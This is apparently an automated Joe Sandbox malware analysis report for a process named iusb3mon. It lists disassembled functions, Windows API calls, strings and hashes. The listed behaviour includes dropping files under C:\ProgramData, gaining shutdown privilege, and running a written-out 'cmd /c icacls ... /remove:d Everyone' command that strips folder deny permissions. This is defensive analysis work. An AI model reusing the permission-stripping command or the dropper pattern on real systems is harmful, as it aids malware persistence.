Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 652d15e86133f652710bcafd17ffe70d891836f9131ca5256f402d16e4d18b01
Instruction ID: 74ec344eb5daebe20b54753ab50b6e07d19faea718989e95637e5813eae899cd
Opcode Fuzzy Hash: 652d15e86133f652710bcafd17ffe70d891836f9131ca5256f402d16e4d18b01
Instruction Fuzzy Hash: 09F0A7BAB4034B27F9F83E641C81F955115CF46BD1F068421E7116E1D68991C402867C

Function 00C06340 Relevance: 6.0, APIs: 4, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C06460,00C1F12C), ref: 00C06345
UnhandledExceptionFilter.KERNEL32(?,?,00C06460,00C1F12C), ref: 00C0634E
GetCurrentProcess.KERNEL32(C0000409,?,00C06460,00C1F12C), ref: 00C06359
TerminateProcess.KERNEL32(00000000,?,00C06460,00C1F12C), ref: 00C06360

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: c2f75e06713d2e21fe178360e703f5ad01c484a17899d3183d8f6bbb0e9735be
Instruction ID: f261ad16321c2b9016ed0d84791eb8e45fe24ea85383d91ecbff3772cbb55631
Opcode Fuzzy Hash: c2f75e06713d2e21fe178360e703f5ad01c484a17899d3183d8f6bbb0e9735be
Instruction Fuzzy Hash: 89D0CA36000208ABDA40BBE0ED0CB8C7A2ABB0E302F048400FB0AC20A1DAB14500AB63

Function 06D03F29 Relevance: 4.5, APIs: 3, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b8802c2c369fd64681fe52d0fc02327686666dddd14e7c8a1ff3bbebed186a4
Instruction ID: bcf8227aca5014817ac55a2198074dfe2d4a844e096824342404017d9c451d04
Opcode Fuzzy Hash: 4b8802c2c369fd64681fe52d0fc02327686666dddd14e7c8a1ff3bbebed186a4
Instruction Fuzzy Hash: CCF03C3190810BAFFF81AF61DC08BAE7FBEAF04240B058421F956D51A0DB70C615DBA1

Function 06CF39EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 06CF8FF7: LoadLibraryA.KERNEL32(ADVAPI32.dll,00000000,SeShutdownPrivilege,?,?,06CF39FA,SeShutdownPrivilege,00000001,?,06CF200F,?), ref: 06CF900F
Part of subcall function 06CF8FF7: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 06CF901F
Part of subcall function 06CF8FF7: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 06CF902A
Part of subcall function 06CF8FF7: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 06CF9035
Part of subcall function 06CF8FF7: LoadLibraryA.KERNEL32(kernel32.dll,?,06CF39FA,SeShutdownPrivilege,00000001,?,06CF200F,?), ref: 06CF903F
Part of subcall function 06CF8FF7: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 06CF904A
Part of subcall function 06CF8FF7: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06CF9092
Part of subcall function 06CF8FF7: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 06CF909A
Part of subcall function 06CF8FF7: CloseHandle.KERNEL32(?), ref: 06CF90A9
Part of subcall function 06CF8FF7: FreeLibrary.KERNEL32(00000000), ref: 06CF90BA
Part of subcall function 06CF8FF7: FreeLibrary.KERNEL32(00000000), ref: 06CF90C5

ExitWindowsEx.USER32(?,00000000), ref: 06CF3A02

Strings

SeShutdownPrivilege, xrefs: 06CF39ED, 06CF39F4, 06CF3A0A

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
String ID: SeShutdownPrivilege
API String ID: 3789203340-3733053543
Opcode ID: e6b2d8e7826f72a93f9e5ad8995543dad29b50805793bae71c2e8ef3ecfb32c5
Instruction ID: ebf5dffd54124e0d1884ee91f28c82995d5cb6ccc4cd6f9127f2a16e2441fa3b
Opcode Fuzzy Hash: e6b2d8e7826f72a93f9e5ad8995543dad29b50805793bae71c2e8ef3ecfb32c5
Instruction Fuzzy Hash: 35D0C93215E6A07DF5D526147C0BB8953968B01720F21051AF224682D05E962881119D

Function 04EC00CD Relevance: 2.6, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

ntdl, xrefs: 04EC0185
l, xrefs: 04EC018C

Memory Dump Source

Source File: 00000021.00000002.4652369684.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_4ec0000_iusb3mon.jbxd

Yara matches

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
Instruction ID: bea08f6282513347c90710047f96ab28b72ee44713fda28567d5c2c50364089a
Opcode Fuzzy Hash: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
Instruction Fuzzy Hash: 10210171A00520DFDF289F94859962FBBE6EF44718B12859DE4059F354EB30EE02C7D1

Function 00C1817A Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4752ed74c6e0d5fc0635c5e9ee1919fb5ee4d4faf056dc546268fc3d4a948d2d
Instruction ID: 473a25a64f00e2b79e76f405665eb673f93580bbe6a7e1373e404bca2c9d8fba
Opcode Fuzzy Hash: 4752ed74c6e0d5fc0635c5e9ee1919fb5ee4d4faf056dc546268fc3d4a948d2d
Instruction Fuzzy Hash: 5BE04633915268EBCB14DB88C904D8AF2ECEB86B00B250496BA01E3200C674DE41E7D0

Function 00C0DB1C Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 694cbe831bc19fd0730d4c407680a11a69efbe1f69b7222d89b60d0701cb05dc
Instruction ID: 88fa4f09a30eddd76cad216a39f9be07a7395716b4cb3342be001317652dd440
Opcode Fuzzy Hash: 694cbe831bc19fd0730d4c407680a11a69efbe1f69b7222d89b60d0701cb05dc
Instruction Fuzzy Hash: 50C08C75004D0087CE298950C2F13A83354A393782FD0068CC4130B686C91E9D87FA00

Function 06CF2772 Relevance: 78.9, APIs: 16, Strings: 29, Instructions: 173filesleeplibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 06CF2A15: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06CF2661,c:\inst.ini), ref: 06CF2A2B
Part of subcall function 06CF2A15: WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06CF2661,c:\inst.ini), ref: 06CF2A40
Part of subcall function 06CF2A15: CloseHandle.KERNEL32(00000000,?,06CF2661,c:\inst.ini), ref: 06CF2A4D

Part of subcall function 06CF1C74: SetFileAttributesA.KERNEL32(00000000,00000080,06CF682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06CF1C88

Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 06CF27B0
DeleteFileA.KERNEL32(C:\ProgramData\upx.rar,?,?,00000000,?,?), ref: 06CF27B9
DeleteFileA.KERNEL32(C:\ProgramData\Data\upx.rar,?,?,00000000,?,?), ref: 06CF27BC
Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 06CF27C3
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000,?,?), ref: 06CF27D3
LoadLibraryA.KERNEL32(0000004B,?,?,?,00000000,?,?), ref: 06CF2849
GetProcAddress.KERNEL32(00000000), ref: 06CF2850
GetTickCount.KERNEL32 ref: 06CF289E
GetTickCount.KERNEL32 ref: 06CF28D9
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 06CF2901
CreateFileA.KERNEL32(C:\ProgramData\data\upx.rar,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00000000,?,?), ref: 06CF291E
WriteFile.KERNEL32(00000025,?,Ru%d%s,?,00000000,?,?,?,?,?,?,00000000,?,?), ref: 06CF2956
CloseHandle.KERNEL32(00000025,?,?,?,?,?,?,00000000,?,?), ref: 06CF295F
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000,?,?), ref: 06CF296A
DeleteFileA.KERNEL32(c:\tzfz,?,?,?,?,?,?,00000000,?,?), ref: 06CF297B
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 06CF299E

Strings

t, xrefs: 06CF2821
N, xrefs: 06CF27F5
l, xrefs: 06CF2811
e, xrefs: 06CF2829
.dll, xrefs: 06CF2942
C:\ProgramData\upx.rar, xrefs: 06CF2795, 06CF279C, 06CF27B2
h, xrefs: 06CF2841
L, xrefs: 06CF27FD
c:\tzfz, xrefs: 06CF277E, 06CF2976
t, xrefs: 06CF283D
.dll, xrefs: 06CF2932
Ru%d%s, xrefs: 06CF293B, 06CF2941
m, xrefs: 06CF282D
P, xrefs: 06CF2835
a, xrefs: 06CF2839
Plugin32.dll, xrefs: 06CF28A5, 06CF28A8
R, xrefs: 06CF27F1
T, xrefs: 06CF2825
KERNEL32.dll, xrefs: 06CF27E9, 06CF27EC
e, xrefs: 06CF281D
G, xrefs: 06CF2819
E, xrefs: 06CF27F9
p, xrefs: 06CF2831
A, xrefs: 06CF2845
l, xrefs: 06CF2815
K, xrefs: 06CF27E4
C:\ProgramData\data\upx.rar, xrefs: 06CF2919
E, xrefs: 06CF27ED
C:\ProgramData\Data\upx.rar, xrefs: 06CF2788, 06CF278F, 06CF27BB, 06CF296E

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$DeleteSleep$AttributesCloseCountCreateHandleTickWrite$AddressLibraryLoadModuleNameProclstrcat
String ID: .dll$.dll$A$C:\ProgramData\Data\upx.rar$C:\ProgramData\data\upx.rar$C:\ProgramData\upx.rar$E$E$G$K$KERNEL32.dll$L$N$P$Plugin32.dll$R$Ru%d%s$T$a$c:\tzfz$e$e$h$l$l$m$p$t$t
API String ID: 3823570417-1872799604
Opcode ID: fa88f3d37dc9b2f4227dc25cb3b4b195c55bb0e8a9ef60e284cace527466ed9a
Instruction ID: b17c8ba2b43c8c8857ff9ca238f0130d525ed3a661632ad2fe5e11b141471f61
Opcode Fuzzy Hash: fa88f3d37dc9b2f4227dc25cb3b4b195c55bb0e8a9ef60e284cace527466ed9a
Instruction Fuzzy Hash: 827182219082C9EEFB51D7F8DC08BDEBFA95F16304F044189E2946A2C2C7BA5648C776

Function 06CF2750 Relevance: 77.2, APIs: 15, Strings: 29, Instructions: 173filesleeplibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 06CF2A15: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06CF2661,c:\inst.ini), ref: 06CF2A2B
Part of subcall function 06CF2A15: WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06CF2661,c:\inst.ini), ref: 06CF2A40
Part of subcall function 06CF2A15: CloseHandle.KERNEL32(00000000,?,06CF2661,c:\inst.ini), ref: 06CF2A4D

Part of subcall function 06CF1C74: SetFileAttributesA.KERNEL32(00000000,00000080,06CF682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06CF1C88

Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 06CF27B0
DeleteFileA.KERNEL32(C:\ProgramData\upx.rar,?,?,00000000,?,?), ref: 06CF27B9
DeleteFileA.KERNEL32(C:\ProgramData\Data\upx.rar,?,?,00000000,?,?), ref: 06CF27BC
Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 06CF27C3
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000,?,?), ref: 06CF27D3
LoadLibraryA.KERNEL32(0000004B,?,?,?,00000000,?,?), ref: 06CF2849
GetProcAddress.KERNEL32(00000000), ref: 06CF2850
GetTickCount.KERNEL32 ref: 06CF289E
GetTickCount.KERNEL32 ref: 06CF28D9
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 06CF2901
CreateFileA.KERNEL32(C:\ProgramData\data\upx.rar,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00000000,?,?), ref: 06CF291E
WriteFile.KERNEL32(00000025,?,Ru%d%s,?,00000000,?,?,?,?,?,?,00000000,?,?), ref: 06CF2956
CloseHandle.KERNEL32(00000025,?,?,?,?,?,?,00000000,?,?), ref: 06CF295F
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000,?,?), ref: 06CF296A
DeleteFileA.KERNEL32(c:\tzfz,?,?,?,?,?,?,00000000,?,?), ref: 06CF297B
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 06CF299E

Strings

t, xrefs: 06CF2821
N, xrefs: 06CF27F5
l, xrefs: 06CF2811
e, xrefs: 06CF2829
.dll, xrefs: 06CF2942
C:\ProgramData\upx.rar, xrefs: 06CF2795, 06CF279C, 06CF27B2
h, xrefs: 06CF2841
L, xrefs: 06CF27FD
c:\tzfz, xrefs: 06CF277E, 06CF2976
t, xrefs: 06CF283D
.dll, xrefs: 06CF2932
Ru%d%s, xrefs: 06CF293B, 06CF2941
m, xrefs: 06CF282D
P, xrefs: 06CF2835
a, xrefs: 06CF2839
Plugin32.dll, xrefs: 06CF28A5, 06CF28A8
R, xrefs: 06CF27F1
T, xrefs: 06CF2825
KERNEL32.dll, xrefs: 06CF27E9, 06CF27EC
e, xrefs: 06CF281D
G, xrefs: 06CF2819
E, xrefs: 06CF27F9
p, xrefs: 06CF2831
A, xrefs: 06CF2845
l, xrefs: 06CF2815
K, xrefs: 06CF27E4
C:\ProgramData\data\upx.rar, xrefs: 06CF2919
E, xrefs: 06CF27ED
C:\ProgramData\Data\upx.rar, xrefs: 06CF2788, 06CF278F, 06CF27BB, 06CF296E

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$DeleteSleep$AttributesCloseCountCreateHandleTickWrite$AddressLibraryLoadModuleNameProclstrcat
String ID: .dll$.dll$A$C:\ProgramData\Data\upx.rar$C:\ProgramData\data\upx.rar$C:\ProgramData\upx.rar$E$E$G$K$KERNEL32.dll$L$N$P$Plugin32.dll$R$Ru%d%s$T$a$c:\tzfz$e$e$h$l$l$m$p$t$t
API String ID: 3823570417-1872799604
Opcode ID: 73ddc4bf795ac9763fad6530a3d84137a3b8522b0bd099e0b9aab53699385aa8
Instruction ID: 6d0bc726658363d9260a11de9ca41d6eab626f60b4105b910922d81c481e63ab
Opcode Fuzzy Hash: 73ddc4bf795ac9763fad6530a3d84137a3b8522b0bd099e0b9aab53699385aa8
Instruction Fuzzy Hash: 0461A1319082C9EEEB52D7B8DC49BDE7F795F16304F084189E2846A2D2C7BA4648C776

Function 06CF1C8F Relevance: 73.7, APIs: 21, Strings: 21, Instructions: 200filesleeplibraryCOMMON

Download Yara Rule

APIs

WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone",00000000), ref: 06CF1CA3

Part of subcall function 06CF1C74: SetFileAttributesA.KERNEL32(00000000,00000080,06CF682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06CF1C88

Sleep.KERNEL32(000003E8), ref: 06CF1CDF
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao.jpg1), ref: 06CF1CEC
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao.jpg), ref: 06CF1CEF
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao), ref: 06CF1CF6
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\ziliao.jpg), ref: 06CF1CFD
Sleep.KERNEL32(000003E8), ref: 06CF1D04
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06CF1D18
LoadLibraryA.KERNEL32(0000004B,?), ref: 06CF1D8C
GetProcAddress.KERNEL32(00000000), ref: 06CF1D93
GetTickCount.KERNEL32 ref: 06CF1DDF
GetTickCount.KERNEL32 ref: 06CF1E17
lstrcatA.KERNEL32(?,?), ref: 06CF1E3F
CreateFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao.jpg,40000000,00000002,00000000,00000002,00000080,00000000), ref: 06CF1E56
WriteFile.KERNEL32(00000025,?,Ru%d%s,?,00000000), ref: 06CF1E8A
CloseHandle.KERNEL32(00000025), ref: 06CF1E93
Sleep.KERNEL32(000003E8), ref: 06CF1E9E
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 06CF1ECA
TerminateProcess.KERNEL32(00000000), ref: 06CF1ED7
ExitProcess.KERNEL32 ref: 06CF1EDE
GetFileAttributesA.KERNEL32(?), ref: 06CF1F05

Strings

C:\ProgramData\Microsoft\ziliao.jpg, xrefs: 06CF1CCD, 06CF1CF8
P, xrefs: 06CF1D75
t, xrefs: 06CF1D61
open, xrefs: 06CF1EC4
KERNEL32.dll, xrefs: 06CF1D26
p, xrefs: 06CF1D71
C:\ProgramData\Microsoft\Program\ziliao.jpg, xrefs: 06CF1CB5, 06CF1CBB, 06CF1CEE, 06CF1E55, 06CF1EA5, 06CF1EAC
Plugin32.dll, xrefs: 06CF1DE6, 06CF1DE9
e, xrefs: 06CF1D69
T, xrefs: 06CF1D65
a, xrefs: 06CF1D79
Ru%d%s, xrefs: 06CF1E74, 06CF1E7A
C:\ProgramData\Microsoft\Program\ziliao, xrefs: 06CF1CC2, 06CF1CF1
h, xrefs: 06CF1D81
C:\ProgramData\Microsoft\Program\ziliao.jpg1, xrefs: 06CF1CA9, 06CF1CAF, 06CF1CE5
A, xrefs: 06CF1D85
m, xrefs: 06CF1D6D
cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone", xrefs: 06CF1C9E
G, xrefs: 06CF1D59
t, xrefs: 06CF1D7D
e, xrefs: 06CF1D5D

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
